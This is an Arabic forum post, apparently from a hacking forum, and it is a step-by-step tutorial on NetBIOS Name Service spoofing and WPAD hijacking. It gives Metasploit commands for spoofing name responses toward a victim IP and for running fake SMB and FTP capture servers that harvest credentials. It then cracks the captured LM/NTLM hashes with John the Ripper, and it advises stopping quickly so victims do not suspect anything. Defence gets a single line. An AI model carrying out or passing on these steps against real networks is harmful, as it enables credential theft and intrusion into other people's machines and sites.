مساحة اعلانات نصية ذهبية |
||
اعلن هنا | اعلن هنا | اعلن هنا |
|
|
أدوات الموضوع | انواع عرض الموضوع |
#1
|
|||
|
|||
[ شرح ] كل ما تريد معرفتة عن NetBios Name Service Spoofing
بسم اللة الرحمن الرحيم السلام عليكم اعضاء منتدى الديف بونيت
لمقدمة : سوف نتكلم اليوم على هذا النوع من الهجوم - شرح عن NetBios بتفصيل اوامرة طريقة عملة - هجوم NetBIOS Name Registration - هجوم NetBIOS Name Resolution وامثلة وانواعة - هجوم Broadcast NetBIOS Name Resolution وما دخلة في البيانات الصادرة والواردة - هجوم NetBios Name Service Spoofing في الشبكات - Web Proxy Auto-Discovery Hijacking - استعمال الميتاسبلوت في مثل هذا الهجوم - طريقة الحماية منة اولا نعرف عن NetBIOS ولما يستعمل هو اختصار ل Network Basic Input/output System\ والذي يمكن لاجهزة مختلفة في الشبكة (LAN ) ب الاتصال بينهم ب بروتوكول اتصالات وهناك انواع كثيرة منها NPS واختصارها NBT NetBIOS over IPX/SPX ولاكن اليوم في اغلب الانضمة المتحضرة تعمل على "NetBIOS over TCP/IP" ثانيا ل NetBIOS عدة وظائف واهمها : * Name service واسست لتكوين البيانات الثابتة بشبكة وايجادها عن طريق البورت 137\UDP * يسمح بتسجيل اسم NetBIOS في الشبكة * يسمح بمسح NetBIOS عن الشبكة * يسمح ب التقاط حزم بينات والطريقة معروفة ب اسم NetBIOS Name Resolution Session service\Datagram distribution service اعدو لعمل الاتصال بين الاجهزة وعن طريق البورت 139 \TCP * SESSION امكانية الاتصال عن بعد بجهاز * تواجد استعلام في انضمة الوندوز عن طريق الاداه Nbtstat الموجودة في ال NetBIOS وممكن استعمالها بشكل التالي: Nbtstat –a IP_Address مثال على عنوان الايبي 10.0.0.1 قد تلقينا : طبعا هذه معلومات سهلة لن اشرحها تضم نوع الخدمة \ الايبي \اسم الاجهزة\عنوان الماك ادريس NetBIOS Name Registration [NOTE] Nbtstat -n[/NOTE] نشوف الصورة : NetBIOS Name Resolution وهذا النوع من الهجوم نستعمل الامر \\ComputerName\Share طبعا لن اتعمق في مثل هذه المواضبع لانها كبيرة وتاخد وقت سوف اختصر العملية دي لاستخراج اسماء الاجهزة المشاركة لو قرات المقدمة عن ال NetBIOS لا تياس فسوف تهم لان الموضوع يتبع الاخر تابع...... Broadcast NetBIOS Name Resolution محاولة جمع المعلومات والحزم استعملت برنامج Wireshark لفلترة الحين ننفذ الامر nbtstat -a DigitalWhisper والذي يعمل تحت البورت udp.port == 137 نستطيع رؤية الحزم التي تم ارسالها الى 10.0.0.255 في حال لم نتلقى اجابة سيضر Host not found. عنجها نعلم انة لا يتواجد DigitalWhisper (اسم الجهاز) نشوف صورة الفلترة مثال اسم جهازي ARYA-PC ننفذ الامر : nbtstat -a ARYA-PC NetBios Name Service Spoofing تم استغلال مثل هذا الهجوم عن طريق الميتا وشرح بتفصيل هنا http://ipositivesecurity.blogspot.co...ilary-ftw.html كود الثغرة من الموقع http://dev.****************sploit.co...ns_response.rb Web Proxy Auto-Discovery Hijacking بعد تنفيذ Spoofing عل الشبكة HTTP تحديدا شوف الصورة عن طريق الامر GET /wpad.dat HTTP/1.1 في حال وجود WPAD نستطيع ارسال طلب GET للملف المسمى wpad.dat الاسغلال ب M.e.t.a.s.p.l.o.i.t ويكون عن طريق الامر nbns_respons [NOTE] msf > use auxiliary/spoof/nbns/nbns_response[/NOTE] [URL=http://imageshack.us/photo/my-images/59/63891734.png/][/URL نشوف الاستعمال ب امر show options [NOTE] msf auxiliarynbns_response) > show options[/NOTE] [URL=http://imageshack.us/photo/my-images/69/57147246.png/][/URL * INTERFACE عنوان الشبكة التي نريد التنصت عبيها * REGEX استعمال NetBIOS Name غير جهازنا * Resolution كل الطلبات المستقبلة * SPOOFIP رقم الايبي المستهدف مثال كيف بعد ما املئتة : [NOTE] msf auxiliray(nbns_response) > set INTERFACE eth0 INTERFACE => eth0 msf auxiliray(nbns_response) > set SPOOFIP 10.0.0.6 SPOOFIP => 10.0.0.6[/NOTE] شغل ب الامر run [NOTE] msf auxiliray(nbns_response) > run[*] Auxiliary mmodule execution completed[*] NBNS Spoofer started. Listening for NBNS requests[/NOTE] لحين نعمل تنصت تشغيل الامر [NOTE] msf > use auxiliary/server/capture/smb[/NOTE] [URL=http://imageshack.us/photo/my-images/443/12810061.png/][/URL بعد هذة العملية نعبي المعلومات بشكل التالي [NOTE] msf auxiliray(smb) > set JOHNPWFILE /tmp/pwds JOHNPWFILE => /tmp/pwds msf auxiliray(smb) > run[*] Auxiliary mmodule execution completed[*] Server started. [/NOTE] تى نرى انو يشتغل ننفذ الامر jobs راح يضهر بجهاز الضحية صورة لادخال اليوزر والباس [URL=http://imageshack.us/photo/my-images/705/61495160.png/][/URL بمجرد ادخالهم احنا بدورنا نستقبل كما بصورة [URL=http://imageshack.us/photo/my-images/32/64994598.png/][/URL والان نوقف عملية nbns_response ب استخدام الامر jobs [NOTE] msf auxiliary(smb) > jobs Jobs Id Name ---- -- 0 Auxiliary: spoof/nbns/nbns_response 1 Auxiliary: server/capture/smb msf auxiliary(smb) > jobs -k 0 Stopping job: 0...[/NOTE] [URL=http://imageshack.us/photo/my-images/84/51883521.png/][/URL الان وشفنا التشفير الاكواد LM Hash و NTLM Hash نشغل الملف عن طريق الامر [NOTE] root@root:~# cd /pentest/passwords/john root@root:/pentest/passwords/john# john /tmp/pwds_netlmv2[/NOTE] [URL=http://imageshack.us/photo/my-images/207/69447346.png/][/URL اذا كانت كلمة السر سهلة ستضهر بسرعة الحين عنا اكثر من طريقة ل الاختراق الان تقوم بتشغيل nbns_response وبعدها ننفذ الامر [NOTE] msf > use auxiliary/server/capture/ftp[/NOTE] [URL=http://imageshack.us/photo/my-images/19/22068514.png/][/URL SRVHOST + الايبي + ف تي بي للي نريد ان ندخل الية [NOTE] msf auxiliary(ftp) > set SRVHOST 10.0.0.4 SRVHOST => 10.0.0.4[/NOTE] ونشغل run [NOTE] msf auxiliary(ftp) > run[*] Auxiliary mmodule execution completed[*] Server started.[/NOTE] [URL=http://imageshack.us/photo/my-images/3/12111903.png/][/URL راح يضهر بضحية مثل الصورة [URL=http://imageshack.us/photo/my-images/19/30811291./][/URL وفي جهازي : [URL=http://imageshack.us/photo/my-images/42/53880897.png/][/URL بعد ادخال المعلومات نوقف العملية بضغط على ctrl+c حتى لا يشك شرحي هذا عن الاف تي بي لاصحاب المواقع وما اكثرهم وليس فقط الاجهزة :8: الحماية من الهجوم ندخل على الملفات التالية ال hosts و lmhosts ويجب التعديل عليهم وسوف اشرح بموضوع افرادي الى هنا اكون قد انتهيت استحلفكم باللة لا تنقلو الموضوع دون ذكر الكاتب الموضوع لنقاش فتفضلو باسالتكم والسلام عبيكم |
pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore |
أدوات الموضوع | |
انواع عرض الموضوع | |
|
|
المواضيع المتشابهه | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
كل ماتريد معرفتة عن تنفيذ الاساسات السطحية | اشراق العالمrss | اشراق شامل - منوعات | 0 | 05-03-2013 04:11 PM |
[ شرح ] السطو على الشبكة بدمج هجومين DNS Spoofing + Social Engineering | rss | اشراق شامل - منوعات | 0 | 08-17-2012 11:50 PM |
كل ما تحب معرفتة عن الحلويات | eshrag | اشراق شامل - منوعات | 0 | 11-24-2011 05:00 PM |
سيرفس جروب - service group | اشراق العالمrss | إعلانات ودعم | 0 | 01-01-2010 08:00 PM |
حصرياً كل ما تود معرفتة عن بدر4 واخر الترددات | osha soft | اشراق شامل - منوعات | 8 | 01-25-2009 11:41 PM |
شراء روابط نصية | |
راسلنا الآن لشراء روابط نصية باك لينك وجيست بوست | خدمات الباك لينك والروابط النصية |
روابط نصية AAXA |
عسل النحل |
روابط نصية AA1A | |||||
كورة لايف | koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | كورة لايف |
koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | kooralive | مساحة إعلانيه |
روابط نصية2 M4U | ||||
متجر كي ستور | شدات ببجي اقساط | بطاقات قوقل بلاي | بطاقات ايتونز | اكواد شدات ببجي |
روابط نصية AAZ | ||
متجر الرياض | شدات ببجي | شحن شدات ببجي |
روابط نصية KSM | |||||||
خصومات | هدايا وكوبونات | توفير المال | مال واستثمار | صفقات وتسوق | عروض اسواق السعودية | تحسين مالي | كوبونات |
روابط نصية AN | ||||
يلا شوت | يلا شوت | يلا لايف | yalla shoot | يلا شوت |
روابط نصية M11 | |||||||
كورة جول | يلا لايف | دوت سبورت | bein match | yalla shoot | yalla shoot | koora live | koora live |
يلا شوت | koora4live | سوريا لايف | تابع لايف | كورة لايف | كورة جول | كورة لايف | koora live |
روابط نصية AWA | ||||
كورة لايف | Koora live | يلا شوت | Yalla shoot | يلا شوت |
روابط نصية AA3A | ||||
تقييم شركة exness | تقييم شركة binance | تقييم شركة avatrade | تقييم شركة evest | افضل شركات التداول |
روابط نصية S22 | ||||
تشليح السيارات بالرياض | شراء سيارات تشليح بالرياض | تشليح | تشليح الحاير | تشليح السلى |
موقع شراء سيارات تشليح | شراء سيارات تشليح | تشليح السيارات | قطع غيار تشليح | تشاليح |
روابط نصية AAPA | ||||
دراما كافيه | دراما صح | اهواك Tv | فوستا | شبكتي Tv |
Syria liv | مساحة إعلانيه |
روابط نصية AA25 | ||
عبادي الخليج | شدات ببجي | شدات ببجي تمارا |
روابط نصية AA44 | |||||
كيفية شراء سهم امازون | كيفية شراء سهم ارامكو | كيفية شراء سهم لوسيد | كيفية الاستثمار في الذهب | تقييم شركة evest | تعلم تداول الاسهم |
روابط نصية AA45 | ||||
koora live | koora live | يلا شوت | yalla shoot | koora live |